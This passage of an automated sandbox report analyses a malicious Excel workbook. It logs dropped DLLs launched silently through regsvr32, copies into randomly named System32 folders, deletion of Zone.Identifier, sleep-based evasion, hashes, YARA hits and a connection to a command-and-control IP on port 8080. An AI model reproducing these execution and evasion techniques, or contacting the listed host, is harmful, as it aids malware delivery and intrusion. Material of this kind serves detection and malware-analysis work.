Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_000000018000E278 6_2_000000018000E278
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_000000018001447C 6_2_000000018001447C
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_0000000180005E7C 6_2_0000000180005E7C
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF74F7FF0 appears 31 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF70C7FF0 appears 31 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF706BD70 appears 113 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF9D2B3B0 appears 148 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF7067FF0 appears 31 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF70CBD70 appears 113 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF74FBD70 appears 113 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 00000001800153F4 appears 48 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF9D27FF0 appears 31 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF706B3B0 appears 148 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF9D2BD70 appears 113 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF74FB3B0 appears 148 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF70CB3B0 appears 148 times
Source: Datei_26744565.xls Macro extractor: Sheet name: PKEKPPGEKKPGE
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll B59F16EE5E524814316A8BE8EF54EA02F9A496267555E65EEB585E4ADE85FFEC
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll 52769F52F479F16D61C449D307C7FD1FA23FAA0B5589500E0967CD7955CA93D6
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll 306C6E39327DAD93262B4531BA5B95B35F4541C70B0D4A6FE5F1DC8C96C86D8C
Source: Datei_26744565.xls ReversingLabs: Detection: 39%
Source: C:\Windows\System32\regsvr32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\RrQZitdNyvCFEhe\pDnxsvRJXW.dll"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\MreGm\Zazriwdkuo.dll"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AnDDvm\lwQjfM.dll"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\IvkabqgmpEJ\fEKh.dll"
Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr1.ocx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR55EC.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@17/18@4/5
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: Datei_26744565.xls OLE indicator, Workbook stream: true
Source: Datei_26744565.xls.0.dr OLE indicator, Workbook stream: true
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180029710 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 4_2_0000000180029710
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Datei_26744565.xls Initial sample: OLE indicators vbamacros = False
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180006951 pushad ; retf 3_2_0000000180006953
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180006951 pushad ; retf 5_2_0000000180006953
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180006951 pushad ; retf 7_2_0000000180006953
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180006951 pushad ; retf 9_2_0000000180006953
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D30CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 3_2_000007FEF9D30CC0
Source: T35PENELLOsp[1].dll.0.dr Static PE information: real checksum: 0x61dc7 should be: 0x5caa2
Source: Jf8[1].dll.0.dr Static PE information: real checksum: 0x61dc7 should be: 0x5ef33
Source: uxevr1.ocx.0.dr Static PE information: real checksum: 0x61dc7 should be: 0x5ef33
Source: 1Cb5zOjLgWGDemz55C5[1].dll.0.dr Static PE information: real checksum: 0x61dc7 should be: 0x64194
Source: uxevr3.ocx.0.dr Static PE information: real checksum: 0x61dc7 should be: 0x64194
Source: uxevr2.ocx.0.dr Static PE information: real checksum: 0x61dc7 should be: 0x644de
Source: 4HWP0KQI[1].dll.0.dr Static PE information: real checksum: 0x61dc7 should be: 0x644de
Source: uxevr4.ocx.0.dr Static PE information: real checksum: 0x61dc7 should be: 0x5caa2
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\RrQZitdNyvCFEhe\pDnxsvRJXW.dll"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr1.ocx
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\RrQZitdNyvCFEhe\pDnxsvRJXW.dll (copy)
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\MreGm\Zazriwdkuo.dll (copy)
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\IvkabqgmpEJ\fEKh.dll (copy)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr3.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\AnDDvm\lwQjfM.dll (copy)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr2.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr4.ocx
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\RrQZitdNyvCFEhe\pDnxsvRJXW.dll (copy)
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\MreGm\Zazriwdkuo.dll (copy)
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\IvkabqgmpEJ\fEKh.dll (copy)
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\AnDDvm\lwQjfM.dll (copy)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr1.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr3.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr2.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr4.ocx

Boot Survival

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr1.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr3.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr2.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr4.ocx

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\RrQZitdNyvCFEhe\pDnxsvRJXW.dll:Zone.Identifier read attributes | delete
Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\MreGm\Zazriwdkuo.dll:Zone.Identifier read attributes | delete
Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\AnDDvm\lwQjfM.dll:Zone.Identifier read attributes | delete
Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\IvkabqgmpEJ\fEKh.dll:Zone.Identifier read attributes | delete
Source: C:\Windows\System32\regsvr32.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe TID: 1484 Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 2368 Thread sleep time: -300000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 2104 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 1812 Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 324 Thread sleep time: -240000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 1156 Thread sleep time: -240000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 2252 Thread sleep time: -300000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 1288 Thread sleep time: -240000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll
Source: C:\Windows\System32\regsvr32.exe API coverage: 8.6 %
Source: C:\Windows\System32\regsvr32.exe API coverage: 8.6 %
Source: C:\Windows\System32\regsvr32.exe API coverage: 7.7 %
Source: C:\Windows\System32\regsvr32.exe API coverage: 7.7 %
Source: C:\Windows\System32\regsvr32.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose, 4_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose, 6_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose, 8_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 10_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose, 10_2_000000018000BEF0
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation
Source: regsvr32.exe, 00000007.00000002.932271979.000000000023A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D23280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_000007FEF9D23280
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D30215 _itow_s,_invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,_wcsftime_l,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_snwprintf_s,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_oneof,_invoke_watson_if_error,_unlock,GetFileType,WriteConsoleW,GetLastError,_invoke_watson_if_oneof,WriteFile,WriteFile,OutputDebugStringW,_itow_s,_invoke_watson_if_error, 3_2_000007FEF9D30215
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D30CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 3_2_000007FEF9D30CC0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D23280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_000007FEF9D23280
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D2BE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_000007FEF9D2BE50
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000007FEF74F3280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_000007FEF74F3280
Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000007FEF74FBE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_000007FEF74FBE50
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF70CBE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_000007FEF70CBE50
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF70C3280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_000007FEF70C3280
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF706BE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_000007FEF706BE50
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF7063280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_000007FEF7063280

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\regsvr32.exe Network Connect: 165.22.73.229 8080
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\RrQZitdNyvCFEhe\pDnxsvRJXW.dll"
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\MreGm\Zazriwdkuo.dll"
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AnDDvm\lwQjfM.dll"
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\IvkabqgmpEJ\fEKh.dll"
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D28900 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 3_2_000007FEF9D28900
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D28860 HeapCreate,GetVersion,HeapSetInformation, 3_2_000007FEF9D28860

Stealing of Sensitive Information

Source: Yara match File source: 6.2.regsvr32.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.3c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.regsvr32.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.1fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.regsvr32.exe.2e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.regsvr32.exe.450000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.regsvr32.exe.4f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.regsvr32.exe.3c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.regsvr32.exe.450000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.regsvr32.exe.4f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.1fe0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.regsvr32.exe.2e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.regsvr32.exe.3c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.regsvr32.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.917379514.0000000001FE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.947582927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1214454935.00000000001C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.932534809.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1215133055.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1215258266.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.932327058.00000000002E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.925354980.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1214677851.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.946842260.0000000000450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1215228939.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1214643345.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1215293806.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1214621068.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.925541937.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY